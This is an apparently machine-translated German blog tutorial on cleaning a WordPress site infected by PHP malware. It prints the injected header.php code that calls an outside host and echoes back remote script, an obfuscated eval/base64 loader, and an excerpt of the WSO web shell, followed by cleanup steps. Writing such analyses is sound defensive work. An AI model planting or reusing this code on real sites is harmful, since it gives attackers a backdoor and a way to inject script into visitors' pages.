Entfernen WordPress PHP-Virus

Update
0

Dieses Tutorial stellt einen besonderen Fall vor, bei dem ein Blog erstellt wurde WordPress es war infiziert. Entfernung WordPress PHP-Virus.

Neulich ist mir ein verdächtiger Code aufgefallen, bei dem es sich offenbar um einen PHP-Virus handelt WordPress. Der folgende PHP-Code war im vorhanden header.php, vor der Zeile </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Dies ist ein PHP-Code, der aussieht, als würde er versuchen, den Inhalt einer Ressource von einem externen Server abzurufen, aber der Teil, der auf die URL verweist, ist unvollständig.

Der Arbeitsmechanismus ist etwas komplexer und erledigt dies WordPress Der PHP-Virus ist für Besucher betroffener Websites unsichtbar. Stattdessen zielt es auf Suchmaschinen (Google) ab und führt implizit zu einem deutlichen Rückgang der Besucherzahlen auf den betroffenen Websites.

Details zur Schadsoftware WordPress PHP-Virus

1. Der obige Code ist vorhanden in header.php.

2. Eine Datei wurde auf dem Server angezeigt wp-log.php im Ordner wp-includes.

3. wp-log.php enthält einen verschlüsselten Code, der aber relativ einfach zu entschlüsseln ist.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Entschlüsseln Sie Malware-Code von wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Dabei handelt es sich offenbar um ein bösartiges PHP-Skript, das Code für die Authentifizierung und Aktionen für Dateien und Verzeichnisse auf einem Server enthält. Es ist sehr leicht zu erkennen, dass dieses Skript Variablen wie enthält $auth_pass (Authentifizierungspasswort), $default_action (die Standardaktion), $default_use_ajax (standardmäßig Ajax verwenden) und $default_charset (Standard-Zeicheneinstellung).

Offensichtlich verfügt dieses Skript über einen Abschnitt, der HTTP-Benutzeragenten überprüft, um den Zugriff auf bestimmte Web-Bots, wie z. B. Suchmaschinen, zu blockieren. Es gibt auch einen Abschnitt, der den PHP-Sicherheitsmodus überprüft und bestimmte Arbeitsverzeichnisse festlegt.

4. Wenn im Browser auf wp-log.php zugegriffen wird, erscheint eine Webseite mit einem Feld von Beglaubigung. Auf den ersten Blick scheint es sich um einen Dateimanager zu handeln, über den neue Dateien einfach auf den Zielserver hochgeladen werden können.

Wie deviriert man eine Website? WordPress?

Bei der manuellen Virenentfernung geht es immer darum, zunächst die Schwachstelle zu entdecken und zu verstehen.

1. Erstellen Sie ein Backup für die gesamte Website. Dies muss sowohl die Dateien als auch die Datenbank umfassen.

2. Ermitteln Sie ungefähr, wie lange der Virus bereits vorhanden ist, und durchsuchen Sie den Webserver innerhalb des ungefähren Zeitrahmens nach geänderten oder neu erstellten Dateien.

Zum Beispiel, wenn Sie die Dateien sehen möchten .php In der letzten Woche erstellt oder geändert, führen Sie den Befehl auf dem Server aus: 

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Es handelt sich um eine einfache Methode, mit der Sie die Dateien aufdecken können WordPress infiziert und solche, die Malware-Code enthalten.

3. Überprüfen Sie die Datei .htaccess von verdächtigen Richtlinien. Berechtigungszeilen oder Skriptausführung.

4. Überprüfen Sie die Datenbank. Es ist durchaus möglich, dass einige Beiträge und Seiten WordPress mit Malware bearbeitet oder neue hinzugefügt werden Benutzer mit der Rolle von administrator.

5. Überprüfen Sie die Schreibrechte für Ordner und Dateien. chmod şi chown.

Empfohlene Berechtigungen sind: 644 für Dateien und 755 für Verzeichnisse.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Alle aktualisieren WordPress Plugins / WordPress Themes.

Related: Fix Redirect WordPress Hack 2023 (Virus umleiten)

Dies sind „grundlegende“ Methoden, mit denen Sie eine Website/einen Blog devirieren können WordPress. Wenn Sie Probleme haben und Hilfe benötigen, ist der Kommentarbereich geöffnet.

Technikbegeistert, schreibe ich seit 2006 gerne auf StealthSettings.com. Ich habe reichhaltige Erfahrung in Betriebssystemen: macOS, Windows und Linux, sowie in Programmiersprachen und Blogging-Plattformen (WordPress) und für Online-Shops (WooCommerce, Magento, PrestaShop).

Von mir verfasste Tutorials.
AntiVirus & Sicherheit Tutorials und IT-News WordPress
Entfernen WordPress Malware Entfernen WordPress Virus WordPress WordPress htaccess-Virus WordPress Viren-Plugin WordPress Virus WordPress Virus-Themen
So erreichen » WordPress » Entfernen WordPress PHP-Virus

Löschen oder Deinstallieren ModSecurity (mod_security)

Laden Sie Opera 12.02 - Sicherheit und Leistung herunter

Hinterlasse einen Kommentar

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows Vista

Windows XP

Task Manager

Hilfe

Microsoft 365 / Office

Microsoft 365 / Office

Excel

Word

PowerPoint

Outlook

Office 365 Produktivität

Linux & Web-Software

NGINX

Apache HTTP Server

PHP

SQL/MySQL

CentOS

Ubuntu

Web Hosting

WordPress & WooCommerce

Sicherheit & Antivirus

über den Menschenhandel

Antivirus & Security

Malware

Spyware

© 2024 Stealth Settings. IT-Tutorials und Neuigkeiten.

Datenschutz-Bestimmungen | Über Cookies | Kontakt | Über uns